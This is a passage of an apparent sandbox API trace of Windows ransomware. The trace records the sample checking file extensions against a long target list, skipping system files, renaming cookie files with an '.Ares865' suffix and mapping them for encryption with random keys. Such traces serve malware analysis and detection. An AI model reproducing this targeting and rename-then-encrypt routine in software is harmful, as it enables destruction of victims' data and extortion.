returned 3 [0107.689] lstrcmpiW (lpString1="txt", lpString2="gdb") returned 1 [0107.689] lstrlenW (lpString="gdb") returned 3 [0107.689] lstrcmpiW (lpString1="txt", lpString2="gdb") returned 1 [0107.689] lstrlenW (lpString="grdb") returned 4 [0107.689] lstrcmpiW (lpString1=".txt", lpString2="grdb") returned -1 [0107.689] lstrlenW (lpString="gwi") returned 3 [0107.689] lstrcmpiW (lpString1="txt", lpString2="gwi") returned 1 [0107.689] lstrlenW (lpString="hdb") returned 3 [0107.689] lstrcmpiW (lpString1="txt", lpString2="hdb") returned 1 [0107.689] lstrlenW (lpString="his") returned 3 [0107.689] lstrcmpiW (lpString1="txt", lpString2="his") returned 1 [0107.689] lstrlenW (lpString="ib") returned 2 [0107.689] lstrcmpiW (lpString1="xt", lpString2="ib") returned 1 [0107.689] lstrlenW (lpString="idb") returned 3 [0107.689] lstrcmpiW (lpString1="txt", lpString2="idb") returned 1 [0107.689] lstrlenW (lpString="ihx") returned 3 [0107.689] lstrcmpiW (lpString1="txt", lpString2="ihx") returned 1 [0107.689] lstrlenW (lpString="itdb") returned 4 [0107.689] lstrcmpiW (lpString1=".txt", lpString2="itdb") returned -1 [0107.690] lstrlenW (lpString="itw") returned 3 [0107.690] lstrcmpiW (lpString1="txt", lpString2="itw") returned 1 [0107.690] lstrlenW (lpString="jet") returned 3 [0107.690] lstrcmpiW (lpString1="txt", lpString2="jet") returned 1 [0107.690] lstrlenW (lpString="jtx") returned 3 [0107.690] lstrcmpiW (lpString1="txt", lpString2="jtx") returned 1 [0107.690] lstrlenW (lpString="kdb") returned 3 [0107.690] lstrcmpiW (lpString1="txt", lpString2="kdb") returned 1 [0107.690] lstrlenW (lpString="kexi") returned 4 [0107.690] lstrcmpiW (lpString1=".txt", lpString2="kexi") returned -1 [0107.690] lstrlenW (lpString="kexic") returned 5 [0107.690] lstrcmpiW (lpString1="].txt", lpString2="kexic") returned -1 [0107.690] lstrlenW (lpString="kexis") returned 5 [0107.690] lstrcmpiW (lpString1="].txt", lpString2="kexis") returned -1 [0107.690] lstrlenW (lpString="lgc") returned 3 [0107.690] lstrcmpiW (lpString1="txt", lpString2="lgc") returned 1 [0107.690] lstrlenW (lpString="lwx") returned 3 [0107.690] lstrcmpiW (lpString1="txt", lpString2="lwx") returned 1 [0107.690] lstrlenW (lpString="maf") returned 3 [0107.690] lstrcmpiW (lpString1="txt", lpString2="maf") returned 1 [0107.690] lstrlenW (lpString="maq") returned 3 [0107.690] lstrcmpiW (lpString1="txt", lpString2="maq") returned 1 [0107.690] lstrlenW (lpString="mar") returned 3 [0107.690] lstrcmpiW (lpString1="txt", lpString2="mar") returned 1 [0107.690] lstrlenW (lpString="marshal") returned 7 [0107.690] lstrcmpiW (lpString1="[1].txt", lpString2="marshal") returned -1 [0107.690] lstrlenW (lpString="mas") returned 3 [0107.690] lstrcmpiW (lpString1="txt", lpString2="mas") returned 1 [0107.690] lstrlenW (lpString="mav") returned 3 [0107.690] lstrcmpiW (lpString1="txt", lpString2="mav") returned 1 [0107.690] lstrlenW (lpString="maw") returned 3 [0107.690] lstrcmpiW (lpString1="txt", lpString2="maw") returned 1 [0107.690] lstrlenW (lpString="mdbhtml") returned 7 [0107.690] lstrcmpiW (lpString1="[1].txt", lpString2="mdbhtml") returned -1 [0107.690] lstrlenW (lpString="mdn") returned 3 [0107.691] lstrcmpiW (lpString1="txt", lpString2="mdn") returned 1 [0107.691] lstrlenW (lpString="mdt") returned 3 [0107.691] lstrcmpiW (lpString1="txt", lpString2="mdt") returned 1 [0107.691] lstrlenW (lpString="mfd") returned 3 [0107.691] lstrcmpiW (lpString1="txt", lpString2="mfd") returned 1 [0107.691] lstrlenW (lpString="mpd") returned 3 [0107.691] lstrcmpiW (lpString1="txt", lpString2="mpd") returned 1 [0107.691] lstrlenW (lpString="mrg") returned 3 [0107.691] lstrcmpiW (lpString1="txt", lpString2="mrg") returned 1 [0107.691] lstrlenW (lpString="mud") returned 3 [0107.691] lstrcmpiW (lpString1="txt", lpString2="mud") returned 1 [0107.691] lstrlenW (lpString="mwb") returned 3 [0107.691] lstrcmpiW (lpString1="txt", lpString2="mwb") returned 1 [0107.691] lstrlenW (lpString="myd") returned 3 [0107.691] lstrcmpiW (lpString1="txt", lpString2="myd") returned 1 [0107.691] lstrlenW (lpString="ndf") returned 3 [0107.691] lstrcmpiW (lpString1="txt", lpString2="ndf") returned 1 [0107.691] lstrlenW (lpString="nnt") returned 3 [0107.691] lstrcmpiW (lpString1="txt", lpString2="nnt") returned 1 [0107.691] lstrlenW (lpString="nrmlib") returned 6 [0107.691] lstrcmpiW (lpString1="1].txt", lpString2="nrmlib") returned -1 [0107.691] lstrlenW (lpString="ns2") returned 3 [0107.691] lstrcmpiW (lpString1="txt", lpString2="ns2") returned 1 [0107.691] lstrlenW (lpString="ns3") returned 3 [0107.691] lstrcmpiW (lpString1="txt", lpString2="ns3") returned 1 [0107.691] lstrlenW (lpString="ns4") returned 3 [0107.691] lstrcmpiW (lpString1="txt", lpString2="ns4") returned 1 [0107.691] lstrlenW (lpString="nsf") returned 3 [0107.691] lstrcmpiW (lpString1="txt", lpString2="nsf") returned 1 [0107.691] lstrlenW (lpString="nv") returned 2 [0107.691] lstrcmpiW (lpString1="xt", lpString2="nv") returned 1 [0107.691] lstrlenW (lpString="nv2") returned 3 [0107.691] lstrcmpiW (lpString1="txt", lpString2="nv2") returned 1 [0107.691] lstrlenW (lpString="nwdb") returned 4 [0107.691] lstrcmpiW (lpString1=".txt", lpString2="nwdb") returned -1 [0107.691] lstrlenW (lpString="nyf") returned 3 [0107.692] lstrcmpiW (lpString1="txt", lpString2="nyf") returned 1 [0107.692] lstrlenW (lpString="odb") returned 3 [0107.692] lstrcmpiW (lpString1="txt", lpString2="odb") returned 1 [0107.692] lstrlenW (lpString="odb") returned 3 [0107.692] lstrcmpiW (lpString1="txt", lpString2="odb") returned 1 [0107.692] lstrlenW (lpString="oqy") returned 3 [0107.692] lstrcmpiW (lpString1="txt", lpString2="oqy") returned 1 [0107.692] lstrlenW (lpString="ora") returned 3 [0107.692] lstrcmpiW (lpString1="txt", lpString2="ora") returned 1 [0107.692] lstrlenW (lpString="orx") returned 3 [0107.692] lstrcmpiW (lpString1="txt", lpString2="orx") returned 1 [0107.692] lstrlenW (lpString="owc") returned 3 [0107.692] lstrcmpiW (lpString1="txt", lpString2="owc") returned 1 [0107.692] lstrlenW (lpString="p96") returned 3 [0107.692] lstrcmpiW (lpString1="txt", lpString2="p96") returned 1 [0107.692] lstrlenW (lpString="p97") returned 3 [0107.692] lstrcmpiW (lpString1="txt", lpString2="p97") returned 1 [0107.692] lstrlenW (lpString="pan") returned 3 [0107.692] lstrcmpiW (lpString1="txt", lpString2="pan") returned 1 [0107.692] lstrlenW (lpString="pdb") returned 3 [0107.692] lstrcmpiW (lpString1="txt", lpString2="pdb") returned 1 [0107.692] lstrlenW (lpString="pdm") returned 3 [0107.692] lstrcmpiW (lpString1="txt", lpString2="pdm") returned 1 [0107.692] lstrlenW (lpString="pnz") returned 3 [0107.692] lstrcmpiW (lpString1="txt", lpString2="pnz") returned 1 [0107.692] lstrlenW (lpString="qry") returned 3 [0107.692] lstrcmpiW (lpString1="txt", lpString2="qry") returned 1 [0107.692] lstrlenW (lpString="qvd") returned 3 [0107.692] lstrcmpiW (lpString1="txt", lpString2="qvd") returned 1 [0107.692] lstrlenW (lpString="rbf") returned 3 [0107.692] lstrcmpiW (lpString1="txt", lpString2="rbf") returned 1 [0107.692] lstrlenW (lpString="rctd") returned 4 [0107.692] lstrcmpiW (lpString1=".txt", lpString2="rctd") returned -1 [0107.692] lstrlenW (lpString="rod") returned 3 [0107.692] lstrcmpiW (lpString1="txt", lpString2="rod") returned 1 [0107.693] lstrlenW (lpString="rodx") returned 4 [0107.693] lstrcmpiW (lpString1=".txt", lpString2="rodx") returned -1 [0107.693] lstrlenW (lpString="rpd") returned 3 [0107.693] lstrcmpiW (lpString1="txt", lpString2="rpd") returned 1 [0107.693] lstrlenW (lpString="rsd") returned 3 [0107.693] lstrcmpiW (lpString1="txt", lpString2="rsd") returned 1 [0107.693] lstrlenW (lpString="sas7bdat") returned 8 [0107.693] lstrcmpiW (lpString1="n[1].txt", lpString2="sas7bdat") returned -1 [0107.693] lstrlenW (lpString="sbf") returned 3 [0107.693] lstrcmpiW (lpString1="txt", lpString2="sbf") returned 1 [0107.693] lstrlenW (lpString="scx") returned 3 [0107.693] lstrcmpiW (lpString1="txt", lpString2="scx") returned 1 [0107.693] lstrlenW (lpString="sdb") returned 3 [0107.693] lstrcmpiW (lpString1="txt", lpString2="sdb") returned 1 [0107.693] lstrlenW (lpString="sdc") returned 3 [0107.693] lstrcmpiW (lpString1="txt", lpString2="sdc") returned 1 [0107.693] lstrlenW (lpString="sdf") returned 3 [0107.693] lstrcmpiW (lpString1="txt", lpString2="sdf") returned 1 [0107.693] lstrlenW (lpString="sis") returned 3 [0107.693] lstrcmpiW (lpString1="txt", lpString2="sis") returned 1 [0107.693] lstrlenW (lpString="spq") returned 3 [0107.693] lstrcmpiW (lpString1="txt", lpString2="spq") returned 1 [0107.693] lstrlenW (lpString="te") returned 2 [0107.693] lstrcmpiW (lpString1="xt", lpString2="te") returned 1 [0107.693] lstrlenW (lpString="teacher") returned 7 [0107.693] lstrcmpiW (lpString1="[1].txt", lpString2="teacher") returned -1 [0107.693] lstrlenW (lpString="tmd") returned 3 [0107.693] lstrcmpiW (lpString1="txt", lpString2="tmd") returned 1 [0107.693] lstrlenW (lpString="tps") returned 3 [0107.693] lstrcmpiW (lpString1="txt", lpString2="tps") returned 1 [0107.693] lstrlenW (lpString="trc") returned 3 [0107.693] lstrcmpiW (lpString1="txt", lpString2="trc") returned 1 [0107.693] lstrlenW (lpString="trc") returned 3 [0107.693] lstrcmpiW (lpString1="txt", lpString2="trc") returned 1 [0107.693] lstrlenW (lpString="trm") returned 3 [0107.694] lstrcmpiW (lpString1="txt", lpString2="trm") returned 1 [0107.694] lstrlenW (lpString="udb") returned 3 [0107.694] lstrcmpiW (lpString1="txt", lpString2="udb") returned -1 [0107.694] lstrlenW (lpString="udl") returned 3 [0107.694] lstrcmpiW (lpString1="txt", lpString2="udl") returned -1 [0107.694] lstrlenW (lpString="usr") returned 3 [0107.694] lstrcmpiW (lpString1="txt", lpString2="usr") returned -1 [0107.694] lstrlenW (lpString="v12") returned 3 [0107.694] lstrcmpiW (lpString1="txt", lpString2="v12") returned -1 [0107.694] lstrlenW (lpString="vis") returned 3 [0107.694] lstrcmpiW (lpString1="txt", lpString2="vis") returned -1 [0107.694] lstrlenW (lpString="vpd") returned 3 [0107.694] lstrcmpiW (lpString1="txt", lpString2="vpd") returned -1 [0107.694] lstrlenW (lpString="vvv") returned 3 [0107.694] lstrcmpiW (lpString1="txt", lpString2="vvv") returned -1 [0107.694] lstrlenW (lpString="wdb") returned 3 [0107.694] lstrcmpiW (lpString1="txt", lpString2="wdb") returned -1 [0107.694] lstrlenW (lpString="wmdb") returned 4 [0107.694] lstrcmpiW (lpString1=".txt", lpString2="wmdb") returned -1 [0107.694] lstrlenW (lpString="wrk") returned 3 [0107.694] lstrcmpiW (lpString1="txt", lpString2="wrk") returned -1 [0107.694] lstrlenW (lpString="xdb") returned 3 [0107.694] lstrcmpiW (lpString1="txt", lpString2="xdb") returned -1 [0107.694] lstrlenW (lpString="xld") returned 3 [0107.694] lstrcmpiW (lpString1="txt", lpString2="xld") returned -1 [0107.694] lstrlenW (lpString="xmlff") returned 5 [0107.694] lstrcmpiW (lpString1="].txt", lpString2="xmlff") returned -1 [0107.694] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.Ares865") returned 86 [0107.694] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.ares865"), dwFlags=0x1) returned 1 [0107.704] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.705] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=272) returned 1 [0107.705] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.706] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.706] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.706] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x124 [0107.711] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0107.712] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.714] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.714] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.715] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0107.715] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="aoldtz.exe") returned -1 [0107.715] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2=".") returned 1 [0107.715] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="..") returned 1 [0107.715] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="windows") returned -1 [0107.715] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="bootmgr") returned -1 [0107.715] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="temp") returned -1 [0107.715] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="pagefile.sys") returned -1 [0107.715] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="boot") returned -1 [0107.715] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="ids.txt") returned -1 [0107.715] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="ntuser.dat") returned -1 [0107.715] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="perflogs") returned -1 [0107.715] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="MSBuild") returned -1 [0107.715] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@m.exactag[1].txt") returned 37 [0107.715] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt") returned 78 [0107.715] lstrcpyW (in: lpString1=0x2cce454, lpString2="5p5nrgjn0js_halpmcxz@m.exactag[1].txt" | out: lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt") returned="5p5nrgjn0js_halpmcxz@m.exactag[1].txt" [0107.715] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@m.exactag[1].txt") returned 37 [0107.715] lstrlenW (lpString="Ares865") returned 7 [0107.715] lstrcmpiW (lpString1="[1].txt", lpString2="Ares865") returned -1 [0107.715] lstrlenW (lpString=".dll") returned 4 [0107.715] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2=".dll") returned 1 [0107.715] lstrlenW (lpString=".lnk") returned 4 [0107.716] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2=".lnk") returned 1 [0107.716] lstrlenW (lpString=".ini") returned 4 [0107.716] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2=".ini") returned 1 [0107.716] lstrlenW (lpString=".sys") returned 4 [0107.716] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2=".sys") returned 1 [0107.716] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@m.exactag[1].txt") returned 37 [0107.716] lstrlenW (lpString="bak") returned 3 [0107.716] lstrcmpiW (lpString1="txt", lpString2="bak") returned 1 [0107.716] lstrlenW (lpString="ba_") returned 3 [0107.716] lstrcmpiW (lpString1="txt", lpString2="ba_") returned 1 [0107.716] lstrlenW (lpString="dbb") returned 3 [0107.716] lstrcmpiW (lpString1="txt", lpString2="dbb") returned 1 [0107.716] lstrlenW (lpString="vmdk") returned 4 [0107.716] lstrcmpiW (lpString1=".txt", lpString2="vmdk") returned -1 [0107.716] lstrlenW (lpString="rar") returned 3 [0107.716] lstrcmpiW (lpString1="txt", lpString2="rar") returned 1 [0107.716] lstrlenW (lpString="zip") returned 3 [0107.716] lstrcmpiW (lpString1="txt", lpString2="zip") returned -1 [0107.716] lstrlenW (lpString="tgz") returned 3 [0107.716] lstrcmpiW (lpString1="txt", lpString2="tgz") returned 1 [0107.716] lstrlenW (lpString="vbox") returned 4 [0107.716] lstrcmpiW (lpString1=".txt", lpString2="vbox") returned -1 [0107.716] lstrlenW (lpString="vdi") returned 3 [0107.716] lstrcmpiW (lpString1="txt", lpString2="vdi") returned -1 [0107.716] lstrlenW (lpString="vhd") returned 3 [0107.716] lstrcmpiW (lpString1="txt", lpString2="vhd") returned -1 [0107.716] lstrlenW (lpString="vhdx") returned 4 [0107.716] lstrcmpiW (lpString1=".txt", lpString2="vhdx") returned -1 [0107.716] lstrlenW (lpString="avhd") returned 4 [0107.716] lstrcmpiW (lpString1=".txt", lpString2="avhd") returned -1 [0107.716] lstrlenW (lpString="db") returned 2 [0107.716] lstrcmpiW (lpString1="xt", lpString2="db") returned 1 [0107.716] lstrlenW (lpString="db2") returned 3 [0107.716] lstrcmpiW (lpString1="txt", lpString2="db2") returned 1 [0107.716] lstrlenW (lpString="db3") returned 3 [0107.717] lstrcmpiW (lpString1="txt", lpString2="db3") returned 1 [0107.717] lstrlenW (lpString="dbf") returned 3 [0107.717] lstrcmpiW (lpString1="txt", lpString2="dbf") returned 1 [0107.717] lstrlenW (lpString="mdf") returned 3 [0107.717] lstrcmpiW (lpString1="txt", lpString2="mdf") returned 1 [0107.717] lstrlenW (lpString="mdb") returned 3 [0107.717] lstrcmpiW (lpString1="txt", lpString2="mdb") returned 1 [0107.717] lstrlenW (lpString="sql") returned 3 [0107.717] lstrcmpiW (lpString1="txt", lpString2="sql") returned 1 [0107.717] lstrlenW (lpString="sqlite") returned 6 [0107.717] lstrcmpiW (lpString1="1].txt", lpString2="sqlite") returned -1 [0107.717] lstrlenW (lpString="sqlite3") returned 7 [0107.717] lstrcmpiW (lpString1="[1].txt", lpString2="sqlite3") returned -1 [0107.717] lstrlenW (lpString="sqlitedb") returned 8 [0107.717] lstrcmpiW (lpString1="g[1].txt", lpString2="sqlitedb") returned -1 [0107.717] lstrlenW (lpString="xml") returned 3 [0107.717] lstrcmpiW (lpString1="txt", lpString2="xml") returned -1 [0107.717] lstrlenW (lpString="$er") returned 3 [0107.717] lstrcmpiW (lpString1="txt", lpString2="$er") returned 1 [0107.717] lstrlenW (lpString="4dd") returned 3 [0107.717] lstrcmpiW (lpString1="txt", lpString2="4dd") returned 1 [0107.717] lstrlenW (lpString="4dl") returned 3 [0107.717] lstrcmpiW (lpString1="txt", lpString2="4dl") returned 1 [0107.717] lstrlenW (lpString="^^^") returned 3 [0107.717] lstrcmpiW (lpString1="txt", lpString2="^^^") returned 1 [0107.717] lstrlenW (lpString="abs") returned 3 [0107.717] lstrcmpiW (lpString1="txt", lpString2="abs") returned 1 [0107.717] lstrlenW (lpString="abx") returned 3 [0107.717] lstrcmpiW (lpString1="txt", lpString2="abx") returned 1 [0107.717] lstrlenW (lpString="accdb") returned 5 [0107.717] lstrcmpiW (lpString1="].txt", lpString2="accdb") returned -1 [0107.717] lstrlenW (lpString="accdc") returned 5 [0107.717] lstrcmpiW (lpString1="].txt", lpString2="accdc") returned -1 [0107.717] lstrlenW (lpString="accde") returned 5 [0107.717] lstrcmpiW (lpString1="].txt", lpString2="accde") returned -1 [0107.717] lstrlenW (lpString="accdr") returned 5 [0107.718] lstrcmpiW (lpString1="].txt", lpString2="accdr") returned -1 [0107.718] lstrlenW (lpString="accdt") returned 5 [0107.718] lstrcmpiW (lpString1="].txt", lpString2="accdt") returned -1 [0107.718] lstrlenW (lpString="accdw") returned 5 [0107.718] lstrcmpiW (lpString1="].txt", lpString2="accdw") returned -1 [0107.718] lstrlenW (lpString="accft") returned 5 [0107.718] lstrcmpiW (lpString1="].txt", lpString2="accft") returned -1 [0107.718] lstrlenW (lpString="adb") returned 3 [0107.718] lstrcmpiW (lpString1="txt", lpString2="adb") returned 1 [0107.718] lstrlenW (lpString="adb") returned 3 [0107.718] lstrcmpiW (lpString1="txt", lpString2="adb") returned 1 [0107.718] lstrlenW (lpString="ade") returned 3 [0107.718] lstrcmpiW (lpString1="txt", lpString2="ade") returned 1 [0107.718] lstrlenW (lpString="adf") returned 3 [0107.718] lstrcmpiW (lpString1="txt", lpString2="adf") returned 1 [0107.718] lstrlenW (lpString="adn") returned 3 [0107.718] lstrcmpiW (lpString1="txt", lpString2="adn") returned 1 [0107.718] lstrlenW (lpString="adp") returned 3 [0107.718] lstrcmpiW (lpString1="txt", lpString2="adp") returned 1 [0107.718] lstrlenW (lpString="alf") returned 3 [0107.718] lstrcmpiW (lpString1="txt", lpString2="alf") returned 1 [0107.718] lstrlenW (lpString="ask") returned 3 [0107.718] lstrcmpiW (lpString1="txt", lpString2="ask") returned 1 [0107.718] lstrlenW (lpString="btr") returned 3 [0107.718] lstrcmpiW (lpString1="txt", lpString2="btr") returned 1 [0107.718] lstrlenW (lpString="cat") returned 3 [0107.718] lstrcmpiW (lpString1="txt", lpString2="cat") returned 1 [0107.718] lstrlenW (lpString="cdb") returned 3 [0107.718] lstrcmpiW (lpString1="txt", lpString2="cdb") returned 1 [0107.718] lstrlenW (lpString="ckp") returned 3 [0107.718] lstrcmpiW (lpString1="txt", lpString2="ckp") returned 1 [0107.718] lstrlenW (lpString="cma") returned 3 [0107.718] lstrcmpiW (lpString1="txt", lpString2="cma") returned 1 [0107.719] lstrlenW (lpString="cpd") returned 3 [0107.719] lstrcmpiW (lpString1="txt", lpString2="cpd") returned 1 [0107.719] lstrlenW (lpString="dacpac") returned 6 [0107.719] lstrcmpiW (lpString1="1].txt", lpString2="dacpac") returned -1 [0107.719] lstrlenW (lpString="dad") returned 3 [0107.719] lstrcmpiW (lpString1="txt", lpString2="dad") returned 1 [0107.719] lstrlenW (lpString="dadiagrams") returned 10 [0107.719] lstrcmpiW (lpString1="tag[1].txt", lpString2="dadiagrams") returned 1 [0107.719] lstrlenW (lpString="daschema") returned 8 [0107.719] lstrcmpiW (lpString1="g[1].txt", lpString2="daschema") returned 1 [0107.719] lstrlenW (lpString="db-journal") returned 10 [0107.719] lstrcmpiW (lpString1="tag[1].txt", lpString2="db-journal") returned 1 [0107.719] lstrlenW (lpString="db-shm") returned 6 [0107.719] lstrcmpiW (lpString1="1].txt", lpString2="db-shm") returned -1 [0107.719] lstrlenW (lpString="db-wal") returned 6 [0107.719] lstrcmpiW (lpString1="1].txt", lpString2="db-wal") returned -1 [0107.719] lstrlenW (lpString="dbc") returned 3 [0107.719] lstrcmpiW (lpString1="txt", lpString2="dbc") returned 1 [0107.719] lstrlenW (lpString="dbs") returned 3 [0107.719] lstrcmpiW (lpString1="txt", lpString2="dbs") returned 1 [0107.719] lstrlenW (lpString="dbt") returned 3 [0107.719] lstrcmpiW (lpString1="txt", lpString2="dbt") returned 1 [0107.719] lstrlenW (lpString="dbv") returned 3 [0107.719] lstrcmpiW (lpString1="txt", lpString2="dbv") returned 1 [0107.719] lstrlenW (lpString="dbx") returned 3 [0107.719] lstrcmpiW (lpString1="txt", lpString2="dbx") returned 1 [0107.719] lstrlenW (lpString="dcb") returned 3 [0107.719] lstrcmpiW (lpString1="txt", lpString2="dcb") returned 1 [0107.720] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.Ares865") returned 87 [0107.720] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.ares865"), dwFlags=0x1) returned 1 [0107.722] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.722] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=118) returned 1 [0107.723] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.723] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.723] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.724] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x380, lpName=0x0) returned 0x124 [0107.730] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x380) returned 0x190000 [0107.730] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.731] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.731] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.732] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt.Ares865") returned 81 [0107.732] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@msn[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@msn[1].txt.ares865"), dwFlags=0x1) returned 1 [0107.733] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@msn[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.734] 